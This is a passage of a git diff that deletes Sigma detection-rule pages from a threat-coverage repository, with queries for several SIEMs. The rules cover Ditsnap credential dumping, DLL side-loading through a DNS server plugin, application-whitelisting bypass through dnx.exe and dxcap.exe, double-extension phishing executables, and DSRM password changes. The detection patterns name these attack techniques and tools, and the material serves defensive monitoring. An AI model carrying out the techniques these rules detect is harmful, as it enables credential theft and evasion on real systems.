-((CommandLine="* -name IEHarden *" CommandLine="* -value 0 *") OR (CommandLine="* -name DEPOff *" CommandLine="* -value 1 *") OR (CommandLine="* -name DisableFirstRunCustomize *" CommandLine="* -value 2 *"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((CommandLine="* -name IEHarden *" CommandLine="* -value 0 *") OR (CommandLine="* -name DEPOff *" CommandLine="* -value 1 *") OR (CommandLine="* -name DisableFirstRunCustomize *" CommandLine="* -value 2 *")))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.* -name IEHarden .*)(?=.*.* -value 0 .*))|.*(?:.*(?=.*.* -name DEPOff .*)(?=.*.* -value 1 .*))|.*(?:.*(?=.*.* -name DisableFirstRunCustomize .*)(?=.*.* -value 2 .*))))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ditsnap.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_ditsnap.md
deleted file mode 100644
index 40aeb35..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_ditsnap.md
+++ /dev/null
@@ -1,177 +0,0 @@
-| Title                    | DIT Snapshot Viewer Use       |
-|:-------------------------|:------------------|
-| **Description**          | Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1003: OS Credential Dumping](https://attack.mitre.org/techniques/T1003)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1003: OS Credential Dumping](../Triggers/T1003.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate admin usage</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://thedfirreport.com/2020/06/21/snatch-ransomware/](https://thedfirreport.com/2020/06/21/snatch-ransomware/)</li><li>[https://github.com/yosqueoy/ditsnap](https://github.com/yosqueoy/ditsnap)</li></ul>  |
-| **Author**               | Furkan Caliskan (@caliskanfurkan_) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: DIT Snapshot Viewer Use
-id: d3b70aad-097e-409c-9df2-450f80dc476b
-status: experimental
-description: Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups.
-references:
-    - https://thedfirreport.com/2020/06/21/snatch-ransomware/
-    - https://github.com/yosqueoy/ditsnap
-author: 'Furkan Caliskan (@caliskanfurkan_)'
-date: 2020/07/04
-tags:
-    - attack.credential_access
-    - attack.t1003
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith:
-            - '\ditsnap.exe'
-    selection2:
-        CommandLine|contains:
-            - 'ditsnap.exe'
-    condition: selection or selection2
-falsepositives:
-    - Legitimate admin usage
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\ditsnap.exe") -or ($_.message -match "CommandLine.*.*ditsnap.exe.*"))) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.Image.keyword:(*\\ditsnap.exe) OR winlog.event_data.CommandLine.keyword:(*ditsnap.exe*))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d3b70aad-097e-409c-9df2-450f80dc476b <<EOF
-{
-  "metadata": {
-    "title": "DIT Snapshot Viewer Use",
-    "description": "Detects the use of Ditsnap tool. Seems to be a tool for ransomware groups.",
-    "tags": [
-      "attack.credential_access",
-      "attack.t1003"
-    ],
-    "query": "(winlog.event_data.Image.keyword:(*\\\\ditsnap.exe) OR winlog.event_data.CommandLine.keyword:(*ditsnap.exe*))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.Image.keyword:(*\\\\ditsnap.exe) OR winlog.event_data.CommandLine.keyword:(*ditsnap.exe*))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'DIT Snapshot Viewer Use'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(Image.keyword:(*\\ditsnap.exe) OR CommandLine.keyword:(*ditsnap.exe*))
-```
-
-
-### splunk
-    
-```
-((Image="*\\ditsnap.exe") OR (CommandLine="*ditsnap.exe*"))
-```
-
-
-### logpoint
-    
-```
-(event_id="1" (Image IN ["*\\ditsnap.exe"] OR CommandLine IN ["*ditsnap.exe*"]))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*.*\ditsnap\.exe)|.*(?:.*.*ditsnap\.exe.*)))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dns_config.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_dns_config.md
deleted file mode 100644
index 624481b..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dns_config.md
+++ /dev/null
@@ -1,180 +0,0 @@
-| Title                    | DNS Server Error Failed Loading the ServerLevelPluginDLL       |
-|:-------------------------|:------------------|
-| **Description**          | This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1073: DLL Side-Loading](https://attack.mitre.org/techniques/T1073)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83](https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83)</li><li>[https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx](https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx)</li><li>[https://twitter.com/gentilkiwi/status/861641945944391680](https://twitter.com/gentilkiwi/status/861641945944391680)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>attack.t1574.002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: DNS Server Error Failed Loading the ServerLevelPluginDLL
-id: cbe51394-cd93-4473-b555-edf0144952d9
-description: This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded
-status: experimental
-date: 2017/05/08
-references:
-    - https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
-    - https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx
-    - https://twitter.com/gentilkiwi/status/861641945944391680
-tags:
-    - attack.defense_evasion
-    - attack.t1073
-    - attack.t1574.002
-author: Florian Roth
-logsource:
-    product: windows
-    service: dns-server
-detection:
-    selection:
-        EventID:
-            - 150
-            - 770
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent | where {($_.ID -eq "150" -or $_.ID -eq "770") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"DNS\ Server" AND winlog.event_id:("150" OR "770"))
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cbe51394-cd93-4473-b555-edf0144952d9 <<EOF
-{
-  "metadata": {
-    "title": "DNS Server Error Failed Loading the ServerLevelPluginDLL",
-    "description": "This rule detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1073",
-      "attack.t1574.002"
-    ],
-    "query": "(winlog.channel:\"DNS\\ Server\" AND winlog.event_id:(\"150\" OR \"770\"))"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"DNS\\ Server\" AND winlog.event_id:(\"150\" OR \"770\"))",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'DNS Server Error Failed Loading the ServerLevelPluginDLL'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:("150" "770")
-```
-
-
-### splunk
-    
-```
-(EventCode="150" OR EventCode="770")
-```
-
-
-### logpoint
-    
-```
-(event_source="DNS Server" event_id IN ["150", "770"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*150|.*770)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dnx.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_dnx.md
deleted file mode 100644
index 9ceb9ef..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dnx.md
+++ /dev/null
@@ -1,176 +0,0 @@
-| Title                    | Application Whitelisting Bypass via Dnx.exe       |
-|:-------------------------|:------------------|
-| **Description**          | Execute C# code located in the consoleapp folder |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate use of dnx.exe by legitimate user</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Csi.yml](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Csi.yml)</li><li>[https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/](https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/)</li></ul>  |
-| **Author**               | Beyu Denis, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Application Whitelisting Bypass via Dnx.exe
-id: 81ebd28b-9607-4478-bf06-974ed9d53ed7
-status: experimental
-description: Execute C# code located in the consoleapp folder
-references:
-    - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Csi.yml
-    - https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
-author: Beyu Denis, oscd.community
-date: 2019/10/26
-modified: 2019/11/04
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1218
-level: medium
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\dnx.exe'
-    condition: selection
-falsepositives:
-    - Legitimate use of dnx.exe by legitimate user
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "Image.*.*\\dnx.exe") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:*\\dnx.exe
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/81ebd28b-9607-4478-bf06-974ed9d53ed7 <<EOF
-{
-  "metadata": {
-    "title": "Application Whitelisting Bypass via Dnx.exe",
-    "description": "Execute C# code located in the consoleapp folder",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.execution",
-      "attack.t1218"
-    ],
-    "query": "winlog.event_data.Image.keyword:*\\\\dnx.exe"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:*\\\\dnx.exe",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Application Whitelisting Bypass via Dnx.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:*\\dnx.exe
-```
-
-
-### splunk
-    
-```
-Image="*\\dnx.exe"
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image="*\\dnx.exe")
-```
-
-
-### grep
-    
-```
-grep -P '^.*\dnx\.exe'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_double_extension.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_double_extension.md
deleted file mode 100644
index 92667d4..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_double_extension.md
+++ /dev/null
@@ -1,185 +0,0 @@
-| Title                    | Suspicious Double Extension       |
-|:-------------------------|:------------------|
-| **Description**          | Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1193: Spearphishing Attachment](https://attack.mitre.org/techniques/T1193)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0001_4688_windows_process_creation](../Data_Needed/DN0001_4688_windows_process_creation.md)</li><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | critical |
-| **False Positives**      | <ul><li>Unknown</li></ul>  |
-| **Development Status**   |  Development Status wasn't defined for this Detection Rule yet  |
-| **References**           | <ul><li>[https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html](https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html)</li><li>[https://twitter.com/blackorbird/status/1140519090961825792](https://twitter.com/blackorbird/status/1140519090961825792)</li></ul>  |
-| **Author**               | Florian Roth (rule), @blu3_team (idea) |
-| Other Tags           | <ul><li>attack.t1566.001</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Suspicious Double Extension
-id: 1cdd9a09-06c9-4769-99ff-626e2b3991b8
-description: Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns
-references:
-    - https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html
-    - https://twitter.com/blackorbird/status/1140519090961825792
-author: Florian Roth (rule), @blu3_team (idea)
-date: 2019/06/26
-tags:
-    - attack.initial_access
-    - attack.t1193
-    - attack.t1566.001
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image:
-            - '*.doc.exe'
-            - '*.docx.exe'
-            - '*.xls.exe'
-            - '*.xlsx.exe'
-            - '*.ppt.exe'
-            - '*.pptx.exe'
-            - '*.rtf.exe'
-            - '*.pdf.exe'
-            - '*.txt.exe'
-            - '*      .exe'
-            - '*______.exe'
-    condition: selection
-falsepositives:
-    - Unknown
-level: critical
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "Image.*.*.doc.exe" -or $_.message -match "Image.*.*.docx.exe" -or $_.message -match "Image.*.*.xls.exe" -or $_.message -match "Image.*.*.xlsx.exe" -or $_.message -match "Image.*.*.ppt.exe" -or $_.message -match "Image.*.*.pptx.exe" -or $_.message -match "Image.*.*.rtf.exe" -or $_.message -match "Image.*.*.pdf.exe" -or $_.message -match "Image.*.*.txt.exe" -or $_.message -match "Image.*.*      .exe" -or $_.message -match "Image.*.*______.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.Image.keyword:(*.doc.exe OR *.docx.exe OR *.xls.exe OR *.xlsx.exe OR *.ppt.exe OR *.pptx.exe OR *.rtf.exe OR *.pdf.exe OR *.txt.exe OR *\ \ \ \ \ \ .exe OR *______.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/1cdd9a09-06c9-4769-99ff-626e2b3991b8 <<EOF
-{
-  "metadata": {
-    "title": "Suspicious Double Extension",
-    "description": "Detects suspicious use of an .exe extension after a non-executable file extension like .pdf.exe, a set of spaces or underlines to cloak the executable file in spear phishing campaigns",
-    "tags": [
-      "attack.initial_access",
-      "attack.t1193",
-      "attack.t1566.001"
-    ],
-    "query": "winlog.event_data.Image.keyword:(*.doc.exe OR *.docx.exe OR *.xls.exe OR *.xlsx.exe OR *.ppt.exe OR *.pptx.exe OR *.rtf.exe OR *.pdf.exe OR *.txt.exe OR *\\ \\ \\ \\ \\ \\ .exe OR *______.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.Image.keyword:(*.doc.exe OR *.docx.exe OR *.xls.exe OR *.xlsx.exe OR *.ppt.exe OR *.pptx.exe OR *.rtf.exe OR *.pdf.exe OR *.txt.exe OR *\\ \\ \\ \\ \\ \\ .exe OR *______.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Suspicious Double Extension'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-Image.keyword:(*.doc.exe *.docx.exe *.xls.exe *.xlsx.exe *.ppt.exe *.pptx.exe *.rtf.exe *.pdf.exe *.txt.exe *      .exe *______.exe)
-```
-
-
-### splunk
-    
-```
-(Image="*.doc.exe" OR Image="*.docx.exe" OR Image="*.xls.exe" OR Image="*.xlsx.exe" OR Image="*.ppt.exe" OR Image="*.pptx.exe" OR Image="*.rtf.exe" OR Image="*.pdf.exe" OR Image="*.txt.exe" OR Image="*      .exe" OR Image="*______.exe")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" Image IN ["*.doc.exe", "*.docx.exe", "*.xls.exe", "*.xlsx.exe", "*.ppt.exe", "*.pptx.exe", "*.rtf.exe", "*.pdf.exe", "*.txt.exe", "*      .exe", "*______.exe"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*.*\.doc\.exe|.*.*\.docx\.exe|.*.*\.xls\.exe|.*.*\.xlsx\.exe|.*.*\.ppt\.exe|.*.*\.pptx\.exe|.*.*\.rtf\.exe|.*.*\.pdf\.exe|.*.*\.txt\.exe|.*.*      \.exe|.*.*______\.exe)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dsrm_password_change.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_dsrm_password_change.md
deleted file mode 100644
index 36a0381..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dsrm_password_change.md
+++ /dev/null
@@ -1,174 +0,0 @@
-| Title                    | Password Change on Directory Service Restore Mode (DSRM) Account       |
-|:-------------------------|:------------------|
-| **Description**          | The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0003: Persistence](https://attack.mitre.org/tactics/TA0003)</li><li>[TA0004: Privilege Escalation](https://attack.mitre.org/tactics/TA0004)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1098: Account Manipulation](https://attack.mitre.org/techniques/T1098)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              | <ul><li>[T1098: Account Manipulation](../Triggers/T1098.md)</li></ul>  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Initial installation of a domain controller</li></ul>  |
-| **Development Status**   | stable |
-| **References**           | <ul><li>[https://adsecurity.org/?p=1714](https://adsecurity.org/?p=1714)</li></ul>  |
-| **Author**               | Thomas Patzke |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Password Change on Directory Service Restore Mode (DSRM) Account
-id: 53ad8e36-f573-46bf-97e4-15ba5bf4bb51
-status: stable
-description: The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.
-references:
-    - https://adsecurity.org/?p=1714
-author: Thomas Patzke
-date: 2017/02/19
-tags:
-    - attack.persistence
-    - attack.privilege_escalation
-    - attack.t1098
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 4794
-    condition: selection
-falsepositives:
-    - Initial installation of a domain controller
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {($_.ID -eq "4794") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:"4794")
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/53ad8e36-f573-46bf-97e4-15ba5bf4bb51 <<EOF
-{
-  "metadata": {
-    "title": "Password Change on Directory Service Restore Mode (DSRM) Account",
-    "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.",
-    "tags": [
-      "attack.persistence",
-      "attack.privilege_escalation",
-      "attack.t1098"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4794\")"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:\"4794\")",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Password Change on Directory Service Restore Mode (DSRM) Account'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-EventID:"4794"
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" EventCode="4794")
-```
-
-
-### logpoint
-    
-```
-(event_source="Microsoft-Windows-Security-Auditing" event_id="4794")
-```
-
-
-### grep
-    
-```
-grep -P '^4794'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dxcap.md b/Atomic_Threat_Coverage/Detection_Rules/win_susp_dxcap.md
deleted file mode 100644
index f908527..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_susp_dxcap.md
+++ /dev/null
@@ -1,179 +0,0 @@
-| Title                    | Application Whitelisting Bypass via Dxcap.exe       |
-|:-------------------------|:------------------|
-| **Description**          | Detects execution of of Dxcap.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1218: Signed Binary Proxy Execution](https://attack.mitre.org/techniques/T1218)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1218: Signed Binary Proxy Execution](../Triggers/T1218.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate execution of dxcap.exe by legitimate user</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Dxcap.yml](https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Dxcap.yml)</li><li>[https://twitter.com/harr0ey/status/992008180904419328](https://twitter.com/harr0ey/status/992008180904419328)</li></ul>  |
-| **Author**               | Beyu Denis, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Application Whitelisting Bypass via Dxcap.exe
-id: 60f16a96-db70-42eb-8f76-16763e333590
-status: experimental
-description: Detects execution of of Dxcap.exe
-references:
-    - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Dxcap.yml
-    - https://twitter.com/harr0ey/status/992008180904419328
-author: Beyu Denis, oscd.community
-date: 2019/10/26
-modified: 2019/11/04
-tags:
-    - attack.defense_evasion
-    - attack.execution
-    - attack.t1218
-level: medium
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        Image|endswith: '\dxcap.exe'
-        CommandLine|contains|all:
-            - '-c'
-            - '.exe'
-    condition: selection
-falsepositives:
-    - Legitimate execution of dxcap.exe by legitimate user
-
-```
-
-
-
-
-
-### powershell
-    
-```
